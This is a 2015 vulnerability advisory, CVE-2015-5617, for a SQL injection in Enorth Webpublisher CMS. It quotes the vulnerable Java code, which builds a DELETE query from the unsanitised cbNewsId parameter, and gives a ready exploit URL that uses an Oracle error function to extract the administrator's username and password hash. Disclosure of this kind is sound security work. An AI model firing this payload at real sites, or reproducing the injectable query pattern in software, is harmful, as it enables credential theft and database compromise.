Enorth Webpublisher CMS SQL Injection
Posted on 14 August 2015
Title: ==== [CVE-2015-5617]Enorth Webpublisher CMS SQL Injection from delete_pending_news.jsp cbNewsid Vendor: ====== http://products.enorth.com.cn/bfnrglxt/index.shtml Enorth Webpublisher CMS so far of the scale of tens of thousands of web sites, with the government, enterprises, scientific research and education and media industries fields such as nearly thousands of business users. Versions Affected: ============== All versions Author: ====== xin.wang(xin.wang(at)dbappsecurity.com.cn) Vulnerability Description: ==================== /pub/m_pending_news/delete_pending_news.jsp <% String[] newsIdGroup; newsIdGroup = request.getParameterValues("cbNewsId"); if (newsIdGroup == null || newsIdGroup.length == 0) { throw new P3Exception("mbx_news_submit_empty_news_id"); } else { penTran.deletePendingNews(newsIdGroup); } %> /WEB-INF/classes/cn/com/enorth/pub3/m_news/PendingNewsBean.class public void deletePendingNews(String[] newsIds) throws Exception { Connection cn = null; PreparedStatement pstm = null; try { StringBuffer buf = new StringBuffer(); buf.append("delete from tn_pending_news where news_id in ("); int i = 0; for (int len = newsIds.length; i < len; i++) { buf.append(newsIds[i]).append(","); } buf.append("-1)"); cn = P3DBTools.getPubConnection(); pstm = cn.prepareStatement(buf.toString()); pstm.executeUpdate();//执è¡ÂÂŒ cn.commit(); } catch (Exception ex) { P3DBTools.rollback(cn); throw ex; } finally { P3DBTools.freeConnection(cn); } } } Exploit: ====== http://website.com/pub/m_pending_news/delete_pending_news.jsp?cbNewsId=2222)%20and%201=ctxsys.drithsx.sn(1,(select%20USER_NAME||PASS_WORD%20from%20TN_USER%20WHERE%20USER_ID=1))— Vulnerability Disclosure Timeline: =========================== 2015-07-28 Found The Vulnerability 2015-08-02 Submitted To The Vendor 2015-08-03 Fixed 2015-08-13 Public Disclosure ================================================================================================